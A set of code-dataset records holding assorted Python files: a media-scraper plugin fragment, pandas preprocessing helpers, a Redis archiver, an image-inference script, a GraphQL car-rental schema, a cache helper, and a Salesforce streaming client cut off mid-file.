(urllib.quote_plus(title))\n search_url = urlparse.urljoin(self.movie_base_url, search_url)\n js_data = self._json_get(search_url, cache_limit=1)\n if 'data' in js_data and 'movies' in js_data['data']:\n for movie in js_data['data']['movies']:\n match_year = str(movie['year'])\n match_url = movie['url'] + '?movie_id=%s' % (movie['id'])\n if 'title_english' in movie:\n match_title = movie['title_english']\n else:\n match_title = movie['title']\n \n if not year or not match_year or year == match_year:\n result = {'title': scraper_utils.cleanse_title(match_title), 'year': match_year, 'url': scraper_utils.pathify_url(match_url)}\n results.append(result)\n \n return results\n \n def __tv_search(self, title, year):\n results = []\n search_url = urlparse.urljoin(self.tv_base_url, '/showlist/')\n html = self._http_get(search_url, cache_limit=48)\n match_year = ''\n norm_title = scraper_utils.normalize_title(title)\n for item in dom_parser.parse_dom(html, 'td', {'class': 'forum_thread_post'}):\n match = re.search('href=\"([^\"]+)[^>]+>([^<]+)', item)\n if match:\n match_url, match_title = match.groups()\n if match_title.upper().endswith(', THE'):\n match_title = 'The ' + match_title[:-5]\n \n if norm_title in scraper_utils.normalize_title(match_title) and (not year or not match_year or year == match_year):\n result = {'title': scraper_utils.cleanse_title(match_title), 'year': match_year, 'url': scraper_utils.pathify_url(match_url)}\n results.append(result)\n return results\n\n @classmethod\n def get_settings(cls):\n settings = super(cls, cls).get_settings()\n settings = scraper_utils.disable_sub_check(settings)\n name = cls.get_name()\n settings.append('<setting id=\"%s-use_https\" type=\"bool\" label=\"%s\" default=\"false\"/>' % (name, i18n('use_https')))\n settings.append('<setting id=\"%s-username\" type=\"text\" label=\"%s\" default=\"\"/>' % (name, i18n('username')))\n settings.append('<setting id=\"%s-password\" type=\"text\" label=\"%s\" option=\"hidden\" default=\"\"/>' % (name, i18n('password')))\n settings.append('<setting id=\"%s-base_url2\" type=\"text\" label=\"%s %s\" default=\"%s\"/>' % (name, i18n('movies'), i18n('base_url'), cls.movie_base_url))\n settings.append('<setting id=\"%s-base_url3\" type=\"text\" label=\"%s %s\" default=\"%s\"/>' % (name, i18n('tv_shows'), i18n('base_url'), cls.tv_base_url))\n return settings\n\n def _json_get(self, url, data=None, allow_redirect=True, cache_limit=8):\n if not self.username or not self.password:\n return {}\n \n if data is None: data = {}\n if 'premiumize.me' in url.lower():\n data.update({'customer_id': self.username, 'pin': self.password})\n result = super(self.__class__, self)._http_get(url, data=data, allow_redirect=allow_redirect, cache_limit=cache_limit)\n js_result = scraper_utils.parse_json(result, url)\n if 'status' in js_result and js_result['status'] == 'error':\n msg = js_result.get('message', js_result.get('status_message', 'Unknown Error'))\n log_utils.log('Premiumize Scraper Error: %s - (%s)' % (url, msg), log_utils.LOGWARNING)\n js_result = {}\n \n return js_result\n","sub_path":"scrapers/premiumize_scraper.py","file_name":"premiumize_scraper.py","file_ext":"py","file_size_in_byte":14790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"176066703","text":"import pandas as pd\nimport numpy as np\nimport math\n\ndef response_outlier_capping(df, variable, multiplier):\n\n ''' winsorise the response variable '''\n\n q1 = np.percentile(df[variable],25)\n q3 = np.percentile(df[variable],75)\n iqr = q3 - q1\n lower = q1 - (iqr * multiplier)\n upper = q3 + (iqr * multiplier)\n\n df[variable] = np.where(df[variable]<=lower, lower, df[variable])\n df[variable] = np.where(df[variable]>=upper, upper, df[variable])\n\n return df\n\n
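# --- Usage sketch (added illustration, not part of the original file). 'loss' is a\n# --- hypothetical response column; values outside Q1/Q3 -/+ 1.5*IQR are capped:\n# df = pd.DataFrame({'loss': [1.0, 2.0, 3.0, 250.0]})\n# df = response_outlier_capping(df, 'loss', multiplier=1.5)\n\n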
def log_response(df, response):\n\n ''' take the natural log of the response variable '''\n\n print('Skewness of untransformed response:\\t' + str(df[response].skew()))\n\n df[response] = np.log(df[response])\n print('Skewness of transformed response:\\t' + str(df[response].skew()))\n\n return df\n\ndef predictors_one_hot_encoding(df):\n\n ''' one hot encode categorical features '''\n\n # find all relevant columns\n all_columns = list(df.columns)\n numeric_types = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64', 'uint8']\n numeric_columns = df.select_dtypes(include=numeric_types).columns.to_list()\n categoric_columns = list(set(all_columns) - set(numeric_columns))\n\n for i in categoric_columns:\n one_hot = pd.get_dummies(df[i], prefix=i)\n df = df.join(one_hot)\n\n # remove categoric cols\n numeric_columns = df.select_dtypes(include=numeric_types).columns.to_list()\n df = df[numeric_columns]\n\n return df\n\ndef exp_response(df, response):\n\n ''' transform the response variable back to original '''\n\n df[response] = np.exp(df[response])\n return df\n\n\ndef find_numerics(df):\n ''' searches a dataframe and returns numeric columns (excluding id cols)'''\n\n # numeric data types\n numeric_dtype = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']\n\n # define all numeric cols\n all_numeric_columns = list(df.select_dtypes(include=numeric_dtype).columns)\n id_columns = ['id', 'loss']\n\n # define all numeric cols excluding id cols\n numeric_columns = list(set(all_numeric_columns) - set(id_columns))\n return numeric_columns\n\n\ndef store_scaling_values(df):\n ''' stores mean and std values '''\n\n # load numeric features to be scaled\n numeric_columns = find_numerics(df)\n\n # create dataframe with stored values\n scaling_df = pd.DataFrame([[p, df[p].mean(), df[p].std()] for p in numeric_columns])\n scaling_df.columns = ['col', 'mean', 'std']\n\n # save the values\n scaling_df.to_csv('outputs/scaling.csv', index=False)\n\n\ndef scale_numerics(df):\n\n ''' read the scaled values and convert numeric features '''\n\n # read the scaled values\n scaling_df = pd.read_csv('outputs/scaling.csv')\n\n # scale columns\n for i in range(scaling_df.shape[0]):\n col = scaling_df.iloc[i][0]\n mean = scaling_df.iloc[i][1]\n std = scaling_df.iloc[i][2]\n df[col] = (df[col] - mean) / std\n\n","sub_path":"xgb/data_transformation.py","file_name":"data_transformation.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"467729498","text":"#!/usr/bin/python\n\nfrom redis import Redis\nimport time\nimport datetime\n\nfrom erigam.lib import ARCHIVE_PERIOD, get_time\nfrom erigam.lib.archive import archive_chat, delete_chat_session, delete_session\nfrom erigam.lib.model import sm, Ban\nfrom erigam.lib.request_methods import redis_pool\n\nif __name__ == '__main__':\n\n db = sm()\n\n print(\"Archiving script started.\")\n redis = Redis(connection_pool=redis_pool)\n\n current_time = datetime.datetime.utcnow()\n\n while True:\n\n new_time = datetime.datetime.utcnow()\n\n # Every minute\n if new_time.minute != current_time.minute:\n print(\"running archiving\")\n\n # Expire IP bans.\n db.query(Ban).filter(Ban.expires < datetime.datetime.utcnow()).delete()\n db.commit()\n\n # Archive chats.\n for chat in redis.zrangebyscore('archive-queue', 0, get_time()):\n print(\"archiving chat: \", chat)\n archive_chat(redis, db, chat)\n\n online = redis.scard('chat.'+chat+'.online')\n idle = 
redis.scard('chat.'+chat+'.idle')\n # Stop archiving if no-one is online any more.\n if online + idle == 0:\n redis.zrem('archive-queue', chat)\n else:\n redis.zadd('archive-queue', chat, get_time(ARCHIVE_PERIOD))\n\n # Delete chat-sessions.\n for chat_session in redis.zrangebyscore('chat-sessions', 0, get_time()):\n print(\"deleting chat session: \", chat_session)\n delete_chat_session(redis, *chat_session.split('/'))\n\n # Delete sessions.\n for session_id in redis.zrangebyscore('all-sessions', 0, get_time()):\n print(\"deleting session: \", session_id)\n delete_session(redis, session_id)\n\n current_time = new_time\n\n time.sleep(1)\n","sub_path":"erigam/archiver.py","file_name":"archiver.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"466677754","text":"from .preprocessing import preprocessing\nfrom .embedding import Embedding\n# from .model import model\nfrom .old_vinn import model\n\nfrom . import Variable, operation, Linear, Graph, node, Sigmoid, cp, np, F, device_guard\n# from NN.NNWrapper import operation, Variable, wrapper, operation, device_guard\n\nfrom timeit import default_timer\nfrom BASIC_LIST.basic import groupby\nfrom IO.basic import load_obj\n\nimport chainer\nfrom .prepare import Channels_pooling\n\n\ndef inference(img, pos, checkPath, device, design=None, patch_size=61, step=30, channels=4095):\n\top = operation(device=device)\n\n\tpreprocess = preprocessing(img, channels=channels, half_size=patch_size//2, device=device, step=step)\n\tembedding = Embedding(patch_size, device=device)\n\t# channels_pooling = Channels_pooling(stride=channels_pooling_stride, device=device)\n\n\n\tembedding_dim = patch_size//2 +1 \n\t_model = model(design=design, device=device, embedding_dim=embedding_dim)\n\tparam_dict = load_obj(checkPath)\n\t# _model.param_from_dict(param_dict)\n\twith device_guard(device):\n\t\tfor key, param in _model.namedparams():\n\t\t\tparam.copydata(chainer.Parameter(cp.asarray(param_dict[key])))\t\n\n\tpos = op.array(pos)\n\n\t_x, pos, groups_start, groups_end = preprocess(pos)\n\n\tPRED = []\n\n\twith device_guard(device):\n\n\t\tfor index in range(groups_start.shape[0]):\n\t\t\t_end = default_timer()\n\n\t\t\tstart = groups_start[index]\n\t\t\tend = groups_end[index]\n\n\t\t\tstart, end = int(start.ndarray()), int(end.ndarray())\n\n\t\t\tx = _x[:,:,start:end]\n\n\t\t\tx = preprocess.beforeEmbedding(x)\n\n\t\t\tx = embedding(x)\n\n\t\t\t# x = x.transpose([1,0,2,3])\n\t\t\t# x = channels_pooling(x)\n\t\t\t# x = x.transpose([1,0,2,3])\n\n\t\t\tx.cast(cp.float32)\n\n\t\t\tx = _model(x)\n\n\t\t\t# x = _model(x)\n\n\t\t\tpred = op.argmax(x, axis=1)\n\t\t\tPRED.append(pred)\n\n\t\tPRED = op.concatenate(PRED, axis=0)\n\n\treturn PRED, pos\n\ndef inference_kernel(img, pos, checkPath, device):\n\top = operation(device=device)\n\tPRED, pos = inference(img, pos, checkPath, device, patch_size=31)\n\tPRED = op.asnumpy(PRED)\n\tpos = op.asnumpy(pos)\n\tprint(type(PRED), type(pos))\n\n\tnp.save(\"./log/{}_PRED.npy\".format(device), PRED)\n\tnp.save(\"./log/{}_pos.npy\".format(device), pos)\n
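\n# --- Usage sketch (added illustration, not part of the original file): single-GPU\n# --- run; the image path and checkpoint path below are hypothetical.\n# img = imreadTif('../DATA/CELL/10.tif')\n# inference_kernel(img, pos.tolist(), './log/params/checkpoint.pkl', device=0)\n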
\nimport multiprocessing as mp\ndef multi_inference(img, pos, checkPath, device_list=[1,2,3]):\n\t'''\n\timg should be numpy array\n\tpos should be list\n\t'''\n\tnum_gpu = len(device_list)\n\tpos_groups = groupby(pos, num_gpu, key='num')\n\n\tctx = mp.get_context('forkserver')\n\n\t# ctx = mp.get_context('spawn')\n\t# que = mp.Queue()\n\n\t# que = ctx.Array('i', range(10))\n\n\tprocesses = []\n\timg = img.astype(np.int32)\n\tcompare = np.arange(4095, dtype=np.int32)\n\tcompare = np.expand_dims(compare, axis=0)\n\n\tfor device, pos in zip(device_list, pos_groups):\n\t\t# with device_guard(device):\n\t\tp = ctx.Process(target=inference_kernel, args=(img, pos, checkPath, device))\n\t\tp.start()\n\t\tprocesses.append(p)\n\t\tprint(device, \"start\")\n\n\n\tfor index, p in enumerate(processes):\n\t\tp.join()\n\n\tPRED = []\n\tpos = []\n\tfor device in device_list:\n\t\tPRED.append(np.load(\"./log/{}_PRED.npy\".format(device)))\n\t\tpos.append(np.load(\"./log/{}_pos.npy\".format(device)))\n\n\tPRED = np.concatenate(PRED, axis=0)\n\tpos = np.concatenate(pos, axis=0)\n\t\n\treturn PRED, pos\n\ndef analyze(img, checkPath, targetPath, device):\n\tstride = 5\n\tpos_x = np.arange(0, 2048, stride)\n\tpos_y = np.arange(0, 2048, stride)\n\tvx, vy = np.meshgrid(pos_x, pos_y)\n\tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0])\n\n\tPRED, pos = inference(img, pos, checkPath, device, patch_size=31)\n\n\top = operation(device=device)\n\n\tINDEX = op.where(PRED>0)\n\tprint(\"finished where\")\n\tpos = pos[INDEX]\n\tpos = pos.ndarray().get()\n\n\timg = rescale_intensity(img.astype('uint8'))\n\n\timg = drawRedPoints(img, pos, half_size=2)\n\n\timwrite(img, targetPath)\n\ndef doubleLayer_analyze(img, device=0):\n\top = operation(device=device)\n\tstride = 31\n\tpos_x = np.arange(0, 2048, stride)\n\tpos_y = np.arange(0, 2048, stride)\n\tvx, vy = np.meshgrid(pos_x, pos_y)\n\tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0])\n\n\tcheckPath = \"./log/params/size_61/20.pkl\"\n\n\tPRED, pos = inference(img, pos, checkPath, device, patch_size=61, step=10)\n\n\tpos = pos[op.where(PRED>0)]\n\n\treturn pos\n\n\n\nif __name__ == '__main__':\n\tfrom CV.ImageIO import center_cell, imreadTif, imshow_plt, plt, gray2rgb, drawMarker, drawRedPoints, imwrite, rescale_intensity\n\timport os, re\n\tcheckPath = \"./log/params/pertube/third_stage.pkl\"\n\n\t# files = list(filter(lambda x:re.search(\"tif\", x), os.listdir(\"./log/imgs\")))\n\t# for file in files:\n\t# \tpath = \"./log/imgs/\"+file \n\t# \ttargetPath = path.replace(\"tif\", \"png\")\n\t# \timg = imreadTif(path)\n\t# \tanalyze(img, checkPath, targetPath, 0)\n\n\n\tpath = \"../../../../DATA/CELL/10.tif\"\n\timg = imreadTif(path)\n\tpos = doubleLayer_analyze(img)\n\n\tpos = pos.cpu()\n\t_pos = []\n\n\thalf_size = 15\n\n\tfor x in range(-1*half_size, half_size, 5):\n\t\tfor y in range(-1*half_size, half_size, 5):\n\t\t\t_pos.append(pos+np.array([x, y]))\n\n\tpos = np.concatenate(_pos, axis=0)\n\tprint(pos.shape)\n\n\timg = rescale_intensity(img.astype('uint8'))\n\n\timg = drawRedPoints(img, pos, half_size=2)\n\n\timwrite(img, \"./log/result.png\")\n\n# if __name__ == '__main__':\n# \tfrom CV.ImageIO import center_cell, imreadTif, imshow_plt, plt, gray2rgb, drawMarker, drawRedPoints, imwrite, rescale_intensity\n# \timport os, re\n# \tfrom timeit import default_timer as timer\n# \tpath = \"../../../../DATA/CELL/10.tif\"\n# \t# path = \"/media/processed/Dec_2017/CST-20171211-01/changhai12.11/DATA/\"\n# \t# path = path+list(filter(lambda x: re.search(\"tif\", x), os.listdir(path)))[0]\n# \tprint(path)\n\n# \t# checkPath = \"./log/params/size_61/25.pkl\"\n# \t# checkPath = \"./log/params/size_31/60.pkl\"\n# \t# checkPath = \"./log/params/size_61/17.pkl\"\n# \tcheckPath = \"./log/params/pertube/third_stage.pkl\"\n\n# \tend = timer()\n\n# \timg = imreadTif(path)\n\n# \tstride = 60\n\n# \tpos_x = np.arange(0, 2048, stride)\n# \tpos_y = np.arange(0, 2048, stride)\n
# \tvx, vy = np.meshgrid(pos_x, pos_y)\n# \tpos = np.stack([vx, vy]).reshape((2, -1)).transpose([1,0]).astype(np.int32)\n# \tprint(pos.shape)\n# \t# pos = pos[:1000]\n\n# \t# multi_inference(img, pos.tolist(), checkPath)\n# \t# PRED, pos = multi_inference(img, pos.tolist(), checkPath, device_list=[1,2,3])\n\n# \tdevice = 0\n\n# \tPRED, pos = inference(img, pos, checkPath, device, patch_size=31)\n\n# \tprint(type(PRED), type(pos))\n# \top = operation(device=device)\n\n# \tINDEX = op.where(PRED>0)\n# \tprint(\"finished where\")\n# \tpos = pos[INDEX]\n# \tpos = pos.ndarray().get()\n\n\n# \timg = rescale_intensity(img.astype('uint8'))\n\n# \t# for pt in pos:\n# \t# \timg = drawMarker(img, pt)\n# \timg = drawRedPoints(img, pos,half_size=2)\n\n# \timwrite(img, \"./log/result.png\")\n\n# \tprint(timer()-end)","sub_path":"zoo/vinn/model/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"340728148","text":"import pandas as pd\r\nfrom IPython.display import display\r\n\r\ndrug = pd.read_csv(\"drug.csv\")\r\n\r\ndrug = drug[[\"state\",\"state_code\",\"year\",\"drug_deaths\"]]\r\ndrug.head()\r\n\r\n\r\ndrug.isnull().sum().head() #check for missing values\r\n\r\n\r\n\r\ndisplay(drug[\"state\"].value_counts()) #check whether every state has the same number of records\r\n\r\ndisplay(drug[\"state_code\"].value_counts())\r\n\r\ndisplay(drug[\"year\"].value_counts())\r\n\r\ndrug.columns = ['State', 'State code','Year','Drug death'] #renaming columns\r\n\r\ndisplay(drug)\r\ndrug = drug[drug.Year != 1999]\r\ndrug\r\n\r\ndrug.to_csv(\"drug_1\")\r\n\r\nimport requests as rq\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nurl = 'https://en.wikipedia.org/wiki/2000_United_States_Census'\r\n\r\nwiki = rq.get(url)\r\n\r\ncaldo = BeautifulSoup(wiki.text, 'html.parser')\r\n\r\ncaldo.head()\r\n\r\ndf = caldo.select(\"table.toccolours\")\r\ndf\r\n\r\n\r\n","sub_path":"PR.py","file_name":"PR.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"593408711","text":"#!/usr/bin/env python\nimport pika\ncred = pika.PlainCredentials('kevin','kevin')\n\nconnection = pika.BlockingConnection(\n pika.ConnectionParameters(host='192.168.0.105', credentials=cred, virtual_host='vhost'))\nchannel = connection.channel()\n\nchannel.queue_declare(queue='hello')\n\nchannel.basic_publish(exchange='', routing_key='hello', body='Hello World!')\nprint(\" [x] Sent 'Hello World!'\")\nconnection.close()","sub_path":"send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"225291765","text":"import graphene\nfrom graphene_django.types import DjangoObjectType\nfrom .models import Customer, Car, Rental\nfrom django.utils import timezone\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\n\nclass CarType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Car\n\t\tfields = '__all__'\n\t\t\nclass CustomerType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Customer\n\t\tfields = '__all__'\n\t\t\nclass RentalType(DjangoObjectType):\n\tclass Meta:\n\t\tmodel = Rental\n\t\tfields = '__all__'\n\t\t\nclass Query(graphene.ObjectType):\n\tall_cars = graphene.List(CarType)\n\t\n\tall_customers = graphene.List(CustomerType)\n\n\tall_rentals = graphene.List(RentalType)\n\t\n\tdef resolve_all_cars(self, info, **kwargs):\n\t\treturn Car.objects.all()\n\n\tdef resolve_all_customers(self, info, **kwargs):\n\t\treturn Customer.objects.all()\t\n\n\tdef resolve_all_rentals(self, info, **kwargs):\n\t\treturn Rental.objects.all()\n\t\t\t\n
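# --- Example query (added illustration, not part of the original file). Graphene\n# --- exposes the snake_case fields above as camelCase:\n# query { allCars { id carMake carColor } }\n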
class CreateCar(graphene.Mutation):\n\tid=graphene.Int()\n\tcar_make=graphene.String()\n\tcar_color=graphene.String()\n\n\tclass Arguments:\n\t\tcar_make=graphene.String()\n\t\tcar_color=graphene.String()\n\n\tdef mutate(self, info, car_make, car_color):\n\t\tcar = Car(car_make=car_make,\n\t\t\t\t\tcar_color=car_color)\n\t\tcar.save()\n\t\treturn CreateCar(\n\t\t\tid=car.id,\n\t\t\tcar_make=car.car_make,\n\t\t\tcar_color=car.car_color)\n\t\t\t\nclass ModifyCar(graphene.Mutation):\n\t\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_make=graphene.String()\n\t\tcar_color=graphene.String()\n\t\n\tcar = graphene.Field(CarType)\n\t\n\tdef mutate(self, info, id, car_make, car_color):\n\t\ttry: \n\t\t\tCar.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\tcar = Car.objects.get(pk=id)\n\t\tcar.car_make = car_make\n\t\tcar.car_color = car_color\n\t\tcar.save()\n\t\treturn ModifyCar(car=car)\n\t\t\n\nclass CreateCustomer(graphene.Mutation):\n\tid=graphene.ID()\n\tcustomer_name=graphene.String()\n\tcontact=graphene.String()\n\n\tclass Arguments:\n\t\tcustomer_name=graphene.String()\n\t\tcontact=graphene.String()\n\t\n\tdef mutate(self, info, customer_name, contact):\n\t\tcustomer = Customer(customer_name=customer_name,\n\t\t\t\t\tcontact=contact)\n\t\tcustomer.save()\n\t\treturn CreateCustomer(\n\t\t\tid=customer.id,\n\t\t\tcustomer_name=customer.customer_name,\n\t\t\tcontact=customer.contact)\n\n\nclass ModifyCustomer(graphene.Mutation):\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcustomer_name=graphene.String()\n\t\tcontact=graphene.String()\n\t\t\n\tcustomer = graphene.Field(CustomerType)\n\t\n\tdef mutate(self, info, id, customer_name, contact):\n\t\ttry: \n\t\t\tCustomer.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\tcustomer = Customer.objects.get(pk=id)\n\t\tcustomer.customer_name=customer_name\n\t\tcustomer.contact=contact\n\t\tcustomer.save()\n\t\treturn ModifyCustomer(customer=customer)\n\nclass CreateRental(graphene.Mutation):\n\tid=graphene.ID()\n\tcar_id=graphene.ID()\n\tcustomer_id=graphene.ID()\n\tcurrently_rented=graphene.Boolean()\n\trented_date_from=graphene.DateTime()\n\trented_date_to=graphene.DateTime()\n\n\tclass Arguments:\n\t\tcar_id=graphene.ID()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\n\tdef mutate(self, info, car_id, customer_id, currently_rented, rented_date_from, rented_date_to):\n\t\ttry: \n\t\t\tCar.objects.get(id=car_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\ttry: \n\t\t\tCustomer.objects.get(id=customer_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\tall_rentals = Rental.objects.filter(car_id=car_id)\n\t\trentals_date_from_values = all_rentals.values_list('rented_date_from', flat=True)\n\t\trentals_date_to_values = all_rentals.values_list('rented_date_to', flat=True)\n\t\trental = 
Rental(car_id=car_id, customer_id=customer_id, currently_rented=currently_rented, rented_date_from=rented_date_from, rented_date_to=rented_date_to)\n\t\ti = 0\n\t\tif (rented_date_from >= timezone.now() and rented_date_to > timezone.now() and rented_date_to > rented_date_from):\n\t\t\twhile i < len(all_rentals):\n\t\t\t\tif not (rentals_date_from_values[i] <= rented_date_from <= rentals_date_to_values[i] or rentals_date_from_values[i] <= rented_date_to <= rentals_date_to_values[i]\n\t\t\t\tor (rented_date_from <= rentals_date_from_values[i] and rented_date_to >= rentals_date_to_values[i])):\n\t\t\t\t\ti+=1\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\treturn ValidationError(\"Rented date violation\")\n\t\t\trental.save()\n\t\t\treturn CreateRental(\n\t\t\tid=rental.id,\n\t\t\tcar_id=rental.car_id, \n\t\t\tcustomer_id=rental.customer_id, \n\t\t\tcurrently_rented=rental.currently_rented, \n\t\t\trented_date_from=rental.rented_date_from, \n\t\t\trented_date_to=rental.rented_date_to)\n\t\telse:\n\t\t\treturn ValidationError(\"Rented date violation\")\n\n\t\t\t\n\t\t\t\nclass ModifyRental(graphene.Mutation):\n\tid=graphene.ID()\n\tcar_id=graphene.ID()\n\tcustomer_id=graphene.ID()\n\tcurrently_rented=graphene.Boolean()\n\trented_date_from=graphene.DateTime()\n\trented_date_to=graphene.DateTime()\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.ID()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\t\n\trental = graphene.Field(RentalType)\n\t\n\tdef mutate(self, info, id, car_id, customer_id, currently_rented, rented_date_from, rented_date_to):\n\t\tif Car.objects.filter(id=car_id).first() is None:\n\t\t\traise ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\tif Customer.objects.filter(id=customer_id).first() is None:\n\t\t\traise ObjectDoesNotExist(\"Customer with this id does not exist\")\n\t\trental = Rental(id=id,car_id=car_id, customer_id=customer_id, currently_rented=currently_rented, rented_date_from=rented_date_from, rented_date_to=rented_date_to)\n\t\tall_rentals = Rental.objects.filter(car_id=car_id).exclude(id=rental.id)\n\t\trentals_date_from_values = all_rentals.values_list('rented_date_from', flat=True)\n\t\trentals_date_to_values = all_rentals.values_list('rented_date_to', flat=True)\n\t\ti = 0\n\t\tif (rented_date_from > timezone.now() and rented_date_to > timezone.now() and rented_date_to > rented_date_from):\n\t\t\twhile i < len(all_rentals):\n\t\t\t\tif not (rentals_date_from_values[i] <= rented_date_from <= rentals_date_to_values[i] or rentals_date_from_values[i] <= rented_date_to <= rentals_date_to_values[i]\n\t\t\t\tor ((rented_date_from <= rentals_date_from_values[i]) and (rented_date_to >= rentals_date_to_values[i]))):\n\t\t\t\t\ti+=1\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\treturn ValidationError(\"Rented date violation\")\n\n\t\telse:\n\t\t\treturn ValidationError(\"Rented date violation\")\n\t\trental.save()\n\t\treturn ModifyRental(id=rental.id,\n\t\tcar_id=rental.car_id, \n\t\tcustomer_id=rental.customer_id, \n\t\tcurrently_rented=rental.currently_rented, \n\t\trented_date_from=rental.rented_date_from, \n\t\trented_date_to=rental.rented_date_to)\n\t\n\t\t\t\n\t\t\nclass ReturnCar(graphene.Mutation):\n\tclass 
Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.Int()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\t\n\trental = graphene.Field(RentalType)\n\t\n\tdef mutate(self, info, id, car_id):\n\t\ttry: \n\t\t\tCar.objects.get(id=car_id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Car with this id does not exist\")\n\t\ttry:\n\t\t\tRental.objects.get(id=id)\n\t\texcept ObjectDoesNotExist: \n\t\t\treturn ObjectDoesNotExist(\"Rental with this id does not exist\")\n\t\trental = Rental.objects.get(id=id, car_id=car_id)\n\t\trental.currently_rented=False\n\t\trental.save()\n\t\treturn ReturnCar(rental=rental)\n\n\nclass ObtainRentals(graphene.Mutation):\n\n\tclass Arguments:\n\t\tid=graphene.ID()\n\t\tcar_id=graphene.Int()\n\t\tcustomer_id=graphene.ID()\n\t\tcurrently_rented=graphene.Boolean()\n\t\trented_date_from=graphene.DateTime()\n\t\trented_date_to=graphene.DateTime()\n\t\tcar_make=graphene.String()\n\t\tcontact=graphene.String()\n\t\t\n\trental = graphene.List(RentalType)\n\t\n\tdef mutate(self, info, **args):\n\t\tif 'contact' in args:\n\t\t\targs['customer__contact'] = args['contact']\n\t\t\tdel args['contact']\n\t\tif 'car_make' in args:\n\t\t\targs['car__car_make'] = args['car_make']\n\t\t\tdel args['car_make']\n\t\trental = Rental.objects.filter(**args)\n\t\treturn ObtainRentals(rental=rental)\n\n\nclass Mutations(graphene.ObjectType):\n\tcreate_car = CreateCar.Field()\n\tmodify_car = ModifyCar.Field()\n\tcreate_customer = CreateCustomer.Field()\n\tmodify_customer = ModifyCustomer.Field()\n\tcreate_rental = CreateRental.Field()\n\tmodify_rental = ModifyRental.Field()\n\treturn_car = ReturnCar.Field()\n\tobtain_rentals = ObtainRentals.Field()\n\t\n\t\nschema = graphene.Schema(query=Query, mutation=Mutations)\n","sub_path":"carrental/rental/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"540343978","text":"import json\nimport pickle\n\ndef write_to_file(path, rows):\n if '.pkl' in path:\n with open(path, 'wb+') as fh:\n pickle.dump(rows, fh)\n else:\n with open(path, 'w+') as fh:\n json.dump(rows, fh)\n\ndef read_from_file(path):\n if '.pkl' in path:\n with open(path, 'rb') as fh:\n return pickle.load(fh)\n else:\n with open(path, 'r') as fh:\n return json.load(fh)\n\ndef read_cache(path, fn):\n path = './caches/' + path\n try:\n data = read_from_file(path)\n except FileNotFoundError:\n data = fn()\n write_to_file(path, data)\n return data\n
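\n# --- Usage sketch (added illustration, not part of the original file). 'fetch_users'\n# --- is a hypothetical zero-argument loader; its result is cached under ./caches/:\n# users = read_cache('users.json', fetch_users)\n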
","sub_path":"src/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"176275720","text":"import argparse\nimport asyncio\nimport collections\nimport datetime\nimport json\nimport os.path\n\nfrom aiosfstream import SalesforceStreamingClient, ReplayMarker\nfrom terminaltables import AsciiTable\n\nargs = {}\n\nasync def stream_events():\n path = os.path.expanduser(f\"~/.private/{args.credentials}.json\")\n creds_string = open(path).read()\n creds_js = json.loads(creds_string)\n streams = sorted(creds_js[\"streams\"])\n\n replay_id = args.replay_id - 1 if args.replay_id > 0 else args.replay_id\n print(f\"Using replay_id: {replay_id}\")\n replay_marker = ReplayMarker(replay_id=replay_id, date=\"\")\n replay = {}\n for stream in streams:\n replay[stream] = replay_marker\n starttime = datetime.datetime.now()\n\n async with SalesforceStreamingClient(\n consumer_key=creds_js[\"consumer_key\"],\n consumer_secret=creds_js[\"consumer_secret\"],\n username=creds_js[\"username\"],\n password=creds_js[\"password\"],\n replay=replay) as client:\n\n # subscribe to topics\n for stream in streams:\n print(f\"Connecting to: {stream}\")\n 